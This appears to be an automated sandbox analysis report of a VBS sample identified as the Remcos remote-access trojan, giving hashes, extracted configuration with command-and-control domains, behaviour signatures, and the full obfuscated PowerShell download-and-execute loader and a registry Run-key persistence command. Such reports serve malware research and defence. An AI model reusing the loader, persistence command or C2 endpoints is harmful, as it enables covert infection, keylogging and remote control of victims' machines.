Overview

overview

10

Static

static

1

fb3c178a17...1f.vbs

windows7-x64

8

fb3c178a17...1f.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 03:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fb3c178a1787f26fcd75494463b9292bb1c7f76b465c7e78381dce5ed7c8011f.vbs

  • Size

    52KB

  • MD5

    6502323c58be777bd7cf1046ba20a468

  • SHA1

    51dc97fd8b87b03426c2b74f29a09e00897732d8

  • SHA256

    fb3c178a1787f26fcd75494463b9292bb1c7f76b465c7e78381dce5ed7c8011f

  • SHA512

    bf570c92c5b80a9d94cc1d4cfa2cd4596b8bbaf0e992427448f54cd83bea2e6867f1eac623d0108f241f7de039c1fc07b87d98cef8232ce2366a3fe030c5011c

  • SSDEEP

    384:I5cVCJUYlJPLpoCuPmKOF5OXOlaNyPepflkhiG0gkIENdy3w7u:I5cXYlJPLyCuOKEwtyPenNGO3Ndy3wi

Score
10/10
remcosfreshdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Fresh

C2

dourtes4hnbouy1.duckdns.org:2487

dourtes4hnbouy1.duckdns.org:2488

dourtes4hnbouy2.duckdns.org:2487

dourtes4hnbouy3.duckdns.org:2487

dourtes4hnbouy4.duckdns.org:2487
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    kamzourts.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    kamncbiu-LBXP9X

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb3c178a1787f26fcd75494463b9292bb1c7f76b465c7e78381dce5ed7c8011f.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4152
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Restudied='letfordrveliges';;$Homeotype='Skrupkulredes';;$Squawen='Unfork';;$Atelo101='Raakiddenes';;$Fredeliggjordes=$host.Name;function Uninhaled($Gripper){If ($Fredeliggjordes) {$Vaarbebuderes=5} for ($Damningness=$Vaarbebuderes;;$Damningness+=6){if(!$Gripper[$Damningness]) { break };$Periodicities+=$Gripper[$Damningness];$Damningnessnklinationers='rissle'}$Periodicities}function Foreslaaede($Kortlg){ .($Matindol) ($Kortlg)}$Prunt=Uninhaled 'Insoun CompEjabbet Rigs.G.stiW';$Prunt+=Uninhaled 'S mimEE bolb An aCC fwilEradiiPanioEJustinG usvT';$Modvgtens=Uninhaled 'footsM BoreoAmn sz VictiAfs.vlContelP,alaaAsper/';$Damningnessncommunicability=Uninhaled 'UnrepT.iltel ectosCircu1Crank2';$Fs='Herre[Blomsn ycloEPhenoTHaanl. Drifs T treTenserAutooVThymii hirac StrtEAndedp CryoOBayoni pilcnsolantserioMForesaDe.epn .esoa No dGPycn EStrepROvers]Mercu:Readj:DiencsAmatreripp CPyrotUPromprDu.liIMisauTGalacy Bkk pKursurResu.oPoochTtelefo elicEnsilO .autlBnnes=Faust$EdvardTjenea Be.tM PortnGennei SammNA,cidGDyrtbNToploEDroniSAgentSGimelNSynodcResono,arenmTilremJerntu,regeNSvr,eIvirilCfrafrA jrnBGua aIjernblSiv,iIPasseTKi afy';$Modvgtens+=Uninhaled 'Telef5Frems.Plads0Inhre Trust(G mmiWBas niAmerinGa dedStyrioForhawFricasBolig bekenNSk.llTSmaal Press1Spd a0Udmat.Resur0Vulga;Pa op SouarWAmeliiIrritnOutgr6 Rev,4 Vibr;Splej Bol.x laa6Stili4 ardi;Unove eforrUndervAnkep:Pro o1Giftb3Gunme1lolit.La ds0Bull )Mil,a LivsfG tidee LigacScattkBegreoUnask/ Efte2 An,a0.orfa1brioc0Und,r0baand1Monil0Linta1Modst SubstFSurfei smarrA,tome DuoefNem po kalex Mass/ Sk a1Ripar3 ylph1 Erhv. V nj0';$Tjreklles=Uninhaled 'GrandUtilskSGenopEAlterr Hass- ennea,ealigFor rEKitchNMell T';$Crabbiest2=Uninhaled 'SmidihHorn tReblatSec,npAwlwosM,lti:Circu/ Hubb/CaprisForf hUlt,aaSkrifaTegmiv DidniMorphp Domer utleoAfstdf snope.efensSponssPiratiBrydeoAnskan Bi.la utolKrved. SelvcSliknoniveambyzan/sgernFIndtrl Aitcl ForaeF rbisCurtafK steuOrat n Un rkMinimt SemiiA,mucoHrigenFdek eS bspnNonim. PummpBrdskc.enskz ene>BrisahForbrtNons.t egnpNglevs Frem: Hekt/Ryg t/Traved anseo KommwUpshonEjen tSagkyisne rmSubpueVirtudSondeoAbbrelProtol R ntaDadderLazybs vrme.Ny,tic iarioGoatimNyopr/SurpaF FordlDari l .hereDecu sMethufRoilyuOsmann IsurkUdtoltLnudji Afhao Undin opgiegleitnSnus .Sovsep IncocAflbsz';$Maximize=Uninhaled 'Ruin >';$Matindol=Uninhaled 'VarisI inhaEStemmx';$Liguorian52='Afmagrende';$Arbitration='\Oversigtslisternes.Nut';Foreslaaede (Uninhaled 'In ib$J.gerGNonspL SubroUsi kbBottoa oresLInsti: estR Omo aDispoP SjamgKystsRInne SBreakSMadr,eDeltiTForly1 Ultr3Musik6 Diss=Halsu$Smr le t,atNVesicvthero:Mausoa Sko.p Pre PJ,xieDBefriaGalacT FrocaStier+ Trks$TruttACr,mnrNaturbVagttiLe,ettAffirrPangeAAnvilTGen tISkrpeOSecurn');Foreslaaede (Uninhaled 'Reifi$ conGtilstL,yomeOSnyltbcesarANeovilExper: estas ElimTStiffo Crudf,maagsLi lek GulgiLfterfLot,ntP.rioe CarirRelatNdis.bESiphoSAdspr=Afgif$Udkrscatta rY tria alapbLoudeBGordyIFratrESlagbsUnincTColl 2Banke.HviskS bor P izdL ArkoIGenaaTOverj(Hydat$StoltmGtef A N.nsxMyrmeiTolermVedliiTonalzMontieTildn)');Foreslaaede (Uninhaled $Fs);$Crabbiest2=$Stofskifternes[0];$Upboils=(Uninhaled 'Under$MorergCeritLTriguoGysenB.holeaSvabel Thur:An elCLukreodr.ina .orttDagske HartRStaa s mbar=Gapotn Undee HoppWInstr-CriopOB.sjabDisscjForsteDupliCSols,T Temp AzomesRe ioYEnsuiSTil kT oachEDyrtiMToldb.Fors.$IsbaaPAcronRPressUHejseNViljet');Foreslaaede ($Upboils);Foreslaaede (Uninhaled 'Borep$Ran pcMiscloDsighaRo,gst B,ske RockrAnsp,sM gno.ShrieHafladeC nflaaffeddSpecteHo inrophi sSttys[Wakhi$BinomTMyl.rj Levir Harce DepokGend l .riklCompoeInversZ.gmu] lgev=Femkr$CiselM Tae oHypoidPreimv unmagFlokstLinieeDoctrn Stens');$Statesman=Uninhaled 'Orthe$ Le ec AfstoUndliaK.ngetInsaleStorhr Polysgly o.AlcidDTuricoBobspwTh.isnThymelSequeoUddela,uelldEly rF yreiFrgemloutbeeSubdi(Serph$Dir gCOpgrarTjeneaFornub Skulb.pigriSo.ubeUndissOv.retVidtl2Sus.a,Bedst$oliefJChefguNonapr TrreiLe ses jertppo tprBlseru SanidThuriedike,nafskecvrd,peFlatt)';$Jurisprudence=$Rapgrsset136;Foreslaaede (Uninhaled 'Scrut$AuntsGDesulLDidymoPe leBdaintaUdvejlFrein:LangbRTampeuTukanNShrimDUn ouI tillnOncesg Mon EA.tepRByssa=Sergi(Unwa tPolleeSamansSteu.TSamvi- SvejP CravAackn TUnlichbier Unni$tat rJ,aareU rear lindIo delSLacerp ma,arKjelduPintaDmidwiE AfslnJessecSkifteFilmh)');while (!$Rundinger) {Foreslaaede (Uninhaled ' Scuf$ Gra.gS.jerl Jocaoskjorb IngeaLivsflE yth:Mnj rGF ndarFil ou.hampnHep.tdOpladf NormlAf raa,ithsd IndbeHypoarResu aAkt.rdLightiEp,gruContrsCopaieVanadrH,lda=Fdsle$ RegeH Pulla,andeaStenonFdestdNo pehPje.svOpht eGigmalNonamsfis ueFysi sA.ilicKnei i Cu crWr stkSyvkauBrst.lSy ehrPr,vaeSma,ss') ;Foreslaaede $Statesman;Foreslaaede (Uninhaled 'T lensForvit akfeATebrertitanTUlykk-LusedS raadLV erdEPrioreAandspIrone Darli4');Foreslaaede (Uninhaled 'Trafi$SecreGIbereLKont oAkadeBOverbabe kilTria :SteurrHuttoUKampuNSymfoD Mi.fiInternRetruGInflue VarerBonde=ba be(UnfultPelsnEAftrkSDobbeTEjend- BedwpFelteA LitutReproHthrea Oplgs$Pennyj Som uupaakrAbsoliTheciSSonatpLoft r Fr mUCamoud SkabeLydsinOversCUnavaeReger)') ;Foreslaaede (Uninhaled 'Inds.$ PartGBomulLJesteoFruitbBoligAAntisl Dena:Va,reCAkrotOChlo,NBon oICrea,ORhizotStatsHFa tpyLianarGoddaIFin eUIn,onM Klud=Probl$Und sgS,cchl UkonoOutsiB k,stA Spiflafteg:InterFhorriaSpermCSam,ao yrmenRespeSAngiaTRetraaSaxhoaF rskLForsie ValltSamleS Medi+Nonan+Symm,%Ens,l$Luxemsno asTNazifOKul eFMi moS.phavKhurtiI probfVertetDemile DestRort.onAskrbe SammSStrad.,kattCFlailOHaa duAtominAssimT') ;$Crabbiest2=$Stofskifternes[$Coniothyrium]}$Silendes=310160;$Boligministerkollega=32341;Foreslaaede (Uninhaled 'Res o$ Routg Prool afteOO dinBLufttANonrelTown.:ForsaSKorreEFugeslJukebfGrdssMRatpro g sbV PervE AsthM In seSymasNGkantTJobna Unres= Cura NaturGHj taEOphidtPseud-HotpocSp ldosandhNOu,paTVi itECos on,behfTFacto Aflaa$FagotJSprjtUMyot rWa,taIUnf es BrowPDeterr s.aluEtn.lDCataceha.leNSummaC BranE');Foreslaaede (Uninhaled ' Mono$LearigHollalSynt oReindb .olsaJernflProc : ergaKRepubl T rio OverkC erukP.ehee Nonff MasoaBegyna,usserRemeesDjett Kjell=He er Orchi[ ryptSUdpanyAfmonssplattSu keeS.venmHvide. paraCMa leoF rtsn Hjemv Rec e atror AnistInsul] Bld,:Tredi:,lpinFCotarrEtbrroKle amD,sigBMesonaFlicksForbue,pide6Pyrob4HaderS ,opotA therSmus iIndkon FaargGenes(C nve$Sa miSSvmmeefodsvlPreomfMttermAc enoAthlevDroskeTotalmResoreH,lernhypert,isun)');Foreslaaede (Uninhaled 'Djvle$VanilG AntelSgel OPossiBAdresABeryll Dime:TrafieSuperI LiferDig.b Hypo=Fulde Fj rn[Tast,SDi ilyOversSThortt,astheDamasMS ilo.LabortD scrE Overx TutaTSands.Udvl.ESludpnEpiskcSteamoCardiDU.metiSoapsNPro,mGUtilf]Kosts:Mecat:WhinnAPuttesEnserc TophISkjorIFond..VerniGSgeruEBadentPucafsOrganTSca cr elecIOvercN IndogFooyu(Ep sk$ Vol,kfluteLSmr koMadniK Gradk oyalEFiumaf leta.issaa.elysrU trkSAnkla)');Foreslaaede (Uninhaled ' e to$ PettGMetabl Mac.OEnganbCatecATil alIsole:IdeolSVen imStupaIOp.raTK,emhTStolees,illDLejerESong sDokk,= nflj$OpslieWoldliPostvR ava.TopposRejesUUncucBForgaS MakeTHalvgrContriDecasNTank gPaste( Lunt$Over.s Unc,i rivL afklERek inCar nd Udb eUdganSReind, Aggr$,isprBConseoVapoul .onjI Al igIntramBuddhIAfpron Af.jIBestiS PranT A dre.pororOmvurKA thoOBondeL Wi tL NonfEWagweGShareaFaus.)');Foreslaaede $Smittedes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3728
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Restudied='letfordrveliges';;$Homeotype='Skrupkulredes';;$Squawen='Unfork';;$Atelo101='Raakiddenes';;$Fredeliggjordes=$host.Name;function Uninhaled($Gripper){If ($Fredeliggjordes) {$Vaarbebuderes=5} for ($Damningness=$Vaarbebuderes;;$Damningness+=6){if(!$Gripper[$Damningness]) { break };$Periodicities+=$Gripper[$Damningness];$Damningnessnklinationers='rissle'}$Periodicities}function Foreslaaede($Kortlg){ .($Matindol) ($Kortlg)}$Prunt=Uninhaled 'Insoun CompEjabbet Rigs.G.stiW';$Prunt+=Uninhaled 'S mimEE bolb An aCC fwilEradiiPanioEJustinG usvT';$Modvgtens=Uninhaled 'footsM BoreoAmn sz VictiAfs.vlContelP,alaaAsper/';$Damningnessncommunicability=Uninhaled 'UnrepT.iltel ectosCircu1Crank2';$Fs='Herre[Blomsn ycloEPhenoTHaanl. Drifs T treTenserAutooVThymii hirac StrtEAndedp CryoOBayoni pilcnsolantserioMForesaDe.epn .esoa No dGPycn EStrepROvers]Mercu:Readj:DiencsAmatreripp CPyrotUPromprDu.liIMisauTGalacy Bkk pKursurResu.oPoochTtelefo elicEnsilO .autlBnnes=Faust$EdvardTjenea Be.tM PortnGennei SammNA,cidGDyrtbNToploEDroniSAgentSGimelNSynodcResono,arenmTilremJerntu,regeNSvr,eIvirilCfrafrA jrnBGua aIjernblSiv,iIPasseTKi afy';$Modvgtens+=Uninhaled 'Telef5Frems.Plads0Inhre Trust(G mmiWBas niAmerinGa dedStyrioForhawFricasBolig bekenNSk.llTSmaal Press1Spd a0Udmat.Resur0Vulga;Pa op SouarWAmeliiIrritnOutgr6 Rev,4 Vibr;Splej Bol.x laa6Stili4 ardi;Unove eforrUndervAnkep:Pro o1Giftb3Gunme1lolit.La ds0Bull )Mil,a LivsfG tidee LigacScattkBegreoUnask/ Efte2 An,a0.orfa1brioc0Und,r0baand1Monil0Linta1Modst SubstFSurfei smarrA,tome DuoefNem po kalex Mass/ Sk a1Ripar3 ylph1 Erhv. V nj0';$Tjreklles=Uninhaled 'GrandUtilskSGenopEAlterr Hass- ennea,ealigFor rEKitchNMell T';$Crabbiest2=Uninhaled 'SmidihHorn tReblatSec,npAwlwosM,lti:Circu/ Hubb/CaprisForf hUlt,aaSkrifaTegmiv DidniMorphp Domer utleoAfstdf snope.efensSponssPiratiBrydeoAnskan Bi.la utolKrved. SelvcSliknoniveambyzan/sgernFIndtrl Aitcl ForaeF rbisCurtafK steuOrat n Un rkMinimt SemiiA,mucoHrigenFdek eS bspnNonim. PummpBrdskc.enskz ene>BrisahForbrtNons.t egnpNglevs Frem: Hekt/Ryg t/Traved anseo KommwUpshonEjen tSagkyisne rmSubpueVirtudSondeoAbbrelProtol R ntaDadderLazybs vrme.Ny,tic iarioGoatimNyopr/SurpaF FordlDari l .hereDecu sMethufRoilyuOsmann IsurkUdtoltLnudji Afhao Undin opgiegleitnSnus .Sovsep IncocAflbsz';$Maximize=Uninhaled 'Ruin >';$Matindol=Uninhaled 'VarisI inhaEStemmx';$Liguorian52='Afmagrende';$Arbitration='\Oversigtslisternes.Nut';Foreslaaede (Uninhaled 'In ib$J.gerGNonspL SubroUsi kbBottoa oresLInsti: estR Omo aDispoP SjamgKystsRInne SBreakSMadr,eDeltiTForly1 Ultr3Musik6 Diss=Halsu$Smr le t,atNVesicvthero:Mausoa Sko.p Pre PJ,xieDBefriaGalacT FrocaStier+ Trks$TruttACr,mnrNaturbVagttiLe,ettAffirrPangeAAnvilTGen tISkrpeOSecurn');Foreslaaede (Uninhaled 'Reifi$ conGtilstL,yomeOSnyltbcesarANeovilExper: estas ElimTStiffo Crudf,maagsLi lek GulgiLfterfLot,ntP.rioe CarirRelatNdis.bESiphoSAdspr=Afgif$Udkrscatta rY tria alapbLoudeBGordyIFratrESlagbsUnincTColl 2Banke.HviskS bor P izdL ArkoIGenaaTOverj(Hydat$StoltmGtef A N.nsxMyrmeiTolermVedliiTonalzMontieTildn)');Foreslaaede (Uninhaled $Fs);$Crabbiest2=$Stofskifternes[0];$Upboils=(Uninhaled 'Under$MorergCeritLTriguoGysenB.holeaSvabel Thur:An elCLukreodr.ina .orttDagske HartRStaa s mbar=Gapotn Undee HoppWInstr-CriopOB.sjabDisscjForsteDupliCSols,T Temp AzomesRe ioYEnsuiSTil kT oachEDyrtiMToldb.Fors.$IsbaaPAcronRPressUHejseNViljet');Foreslaaede ($Upboils);Foreslaaede (Uninhaled 'Borep$Ran pcMiscloDsighaRo,gst B,ske RockrAnsp,sM gno.ShrieHafladeC nflaaffeddSpecteHo inrophi sSttys[Wakhi$BinomTMyl.rj Levir Harce DepokGend l .riklCompoeInversZ.gmu] lgev=Femkr$CiselM Tae oHypoidPreimv unmagFlokstLinieeDoctrn Stens');$Statesman=Uninhaled 'Orthe$ Le ec AfstoUndliaK.ngetInsaleStorhr Polysgly o.AlcidDTuricoBobspwTh.isnThymelSequeoUddela,uelldEly rF yreiFrgemloutbeeSubdi(Serph$Dir gCOpgrarTjeneaFornub Skulb.pigriSo.ubeUndissOv.retVidtl2Sus.a,Bedst$oliefJChefguNonapr TrreiLe ses jertppo tprBlseru SanidThuriedike,nafskecvrd,peFlatt)';$Jurisprudence=$Rapgrsset136;Foreslaaede (Uninhaled 'Scrut$AuntsGDesulLDidymoPe leBdaintaUdvejlFrein:LangbRTampeuTukanNShrimDUn ouI tillnOncesg Mon EA.tepRByssa=Sergi(Unwa tPolleeSamansSteu.TSamvi- SvejP CravAackn TUnlichbier Unni$tat rJ,aareU rear lindIo delSLacerp ma,arKjelduPintaDmidwiE AfslnJessecSkifteFilmh)');while (!$Rundinger) {Foreslaaede (Uninhaled ' Scuf$ Gra.gS.jerl Jocaoskjorb IngeaLivsflE yth:Mnj rGF ndarFil ou.hampnHep.tdOpladf NormlAf raa,ithsd IndbeHypoarResu aAkt.rdLightiEp,gruContrsCopaieVanadrH,lda=Fdsle$ RegeH Pulla,andeaStenonFdestdNo pehPje.svOpht eGigmalNonamsfis ueFysi sA.ilicKnei i Cu crWr stkSyvkauBrst.lSy ehrPr,vaeSma,ss') ;Foreslaaede $Statesman;Foreslaaede (Uninhaled 'T lensForvit akfeATebrertitanTUlykk-LusedS raadLV erdEPrioreAandspIrone Darli4');Foreslaaede (Uninhaled 'Trafi$SecreGIbereLKont oAkadeBOverbabe kilTria :SteurrHuttoUKampuNSymfoD Mi.fiInternRetruGInflue VarerBonde=ba be(UnfultPelsnEAftrkSDobbeTEjend- BedwpFelteA LitutReproHthrea Oplgs$Pennyj Som uupaakrAbsoliTheciSSonatpLoft r Fr mUCamoud SkabeLydsinOversCUnavaeReger)') ;Foreslaaede (Uninhaled 'Inds.$ PartGBomulLJesteoFruitbBoligAAntisl Dena:Va,reCAkrotOChlo,NBon oICrea,ORhizotStatsHFa tpyLianarGoddaIFin eUIn,onM Klud=Probl$Und sgS,cchl UkonoOutsiB k,stA Spiflafteg:InterFhorriaSpermCSam,ao yrmenRespeSAngiaTRetraaSaxhoaF rskLForsie ValltSamleS Medi+Nonan+Symm,%Ens,l$Luxemsno asTNazifOKul eFMi moS.phavKhurtiI probfVertetDemile DestRort.onAskrbe SammSStrad.,kattCFlailOHaa duAtominAssimT') ;$Crabbiest2=$Stofskifternes[$Coniothyrium]}$Silendes=310160;$Boligministerkollega=32341;Foreslaaede (Uninhaled 'Res o$ Routg Prool afteOO dinBLufttANonrelTown.:ForsaSKorreEFugeslJukebfGrdssMRatpro g sbV PervE AsthM In seSymasNGkantTJobna Unres= Cura NaturGHj taEOphidtPseud-HotpocSp ldosandhNOu,paTVi itECos on,behfTFacto Aflaa$FagotJSprjtUMyot rWa,taIUnf es BrowPDeterr s.aluEtn.lDCataceha.leNSummaC BranE');Foreslaaede (Uninhaled ' Mono$LearigHollalSynt oReindb .olsaJernflProc : ergaKRepubl T rio OverkC erukP.ehee Nonff MasoaBegyna,usserRemeesDjett Kjell=He er Orchi[ ryptSUdpanyAfmonssplattSu keeS.venmHvide. paraCMa leoF rtsn Hjemv Rec e atror AnistInsul] Bld,:Tredi:,lpinFCotarrEtbrroKle amD,sigBMesonaFlicksForbue,pide6Pyrob4HaderS ,opotA therSmus iIndkon FaargGenes(C nve$Sa miSSvmmeefodsvlPreomfMttermAc enoAthlevDroskeTotalmResoreH,lernhypert,isun)');Foreslaaede (Uninhaled 'Djvle$VanilG AntelSgel OPossiBAdresABeryll Dime:TrafieSuperI LiferDig.b Hypo=Fulde Fj rn[Tast,SDi ilyOversSThortt,astheDamasMS ilo.LabortD scrE Overx TutaTSands.Udvl.ESludpnEpiskcSteamoCardiDU.metiSoapsNPro,mGUtilf]Kosts:Mecat:WhinnAPuttesEnserc TophISkjorIFond..VerniGSgeruEBadentPucafsOrganTSca cr elecIOvercN IndogFooyu(Ep sk$ Vol,kfluteLSmr koMadniK Gradk oyalEFiumaf leta.issaa.elysrU trkSAnkla)');Foreslaaede (Uninhaled ' e to$ PettGMetabl Mac.OEnganbCatecATil alIsole:IdeolSVen imStupaIOp.raTK,emhTStolees,illDLejerESong sDokk,= nflj$OpslieWoldliPostvR ava.TopposRejesUUncucBForgaS MakeTHalvgrContriDecasNTank gPaste( Lunt$Over.s Unc,i rivL afklERek inCar nd Udb eUdganSReind, Aggr$,isprBConseoVapoul .onjI Al igIntramBuddhIAfpron Af.jIBestiS PranT A dre.pororOmvurKA thoOBondeL Wi tL NonfEWagweGShareaFaus.)');Foreslaaede $Smittedes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3632
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3780
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperspatial" /t REG_EXPAND_SZ /d "%Antiphlogistian% -windowstyle 1 $Palmitoleic=(gp -Path 'HKCU:\Software\Fedtprocenters\').slgtssagas;%Antiphlogistian% ($Palmitoleic)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5024
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperspatial" /t REG_EXPAND_SZ /d "%Antiphlogistian% -windowstyle 1 $Palmitoleic=(gp -Path 'HKCU:\Software\Fedtprocenters\').slgtssagas;%Antiphlogistian% ($Palmitoleic)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2804

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d336b18e0e02e045650ac4f24c7ecaa7

    SHA1

    87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

    SHA256

    87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

    SHA512

    e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_woxakvq3.kyu.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Oversigtslisternes.Nut
    Filesize

    445KB

    MD5

    abcbb25c003afd9afc598e5628e22953

    SHA1

    d8a2b04050264aaab4491dc2c5125c23609d1533

    SHA256

    47b59e11d1bbaf43c7d8b5f52846709c034025e9bdeb98a126dc49579813f4cf

    SHA512

    f683bf82869ae29b2f9c11ee6030426aca36699f4e1bf0e936bef64e30517da4030d5cb6ee75c623ea6d4fbf441913a69e680c58e30f94e3e15dd7901d9e1a4b

    Download Submit

  • memory/3632-43-0x0000000006E40000-0x0000000006E5A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3632-45-0x0000000007B30000-0x0000000007B52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3632-48-0x0000000009370000-0x000000000DADC000-memory.dmp

    Filesize

    71.4MB

    Download

  • memory/3632-46-0x0000000008DC0000-0x0000000009364000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3632-44-0x0000000007BD0000-0x0000000007C66000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3632-24-0x0000000005370000-0x00000000053A6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3632-25-0x0000000005A90000-0x00000000060B8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3632-26-0x0000000005A50000-0x0000000005A72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3632-27-0x0000000006130000-0x0000000006196000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3632-28-0x00000000062D0000-0x0000000006336000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3632-38-0x0000000006340000-0x0000000006694000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3632-42-0x0000000008190000-0x000000000880A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3632-40-0x0000000006920000-0x000000000693E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3632-41-0x0000000006F30000-0x0000000006F7C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3728-15-0x00007FFF59F70000-0x00007FFF5AA31000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3728-4-0x00007FFF59F73000-0x00007FFF59F75000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3728-16-0x00007FFF59F70000-0x00007FFF5AA31000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3728-23-0x00007FFF59F70000-0x00007FFF5AA31000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3728-20-0x00007FFF59F70000-0x00007FFF5AA31000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3728-5-0x000001706E630000-0x000001706E652000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3728-19-0x00007FFF59F73000-0x00007FFF59F75000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3780-58-0x0000000000800000-0x0000000001A54000-memory.dmp

    Filesize

    18.3MB

    Download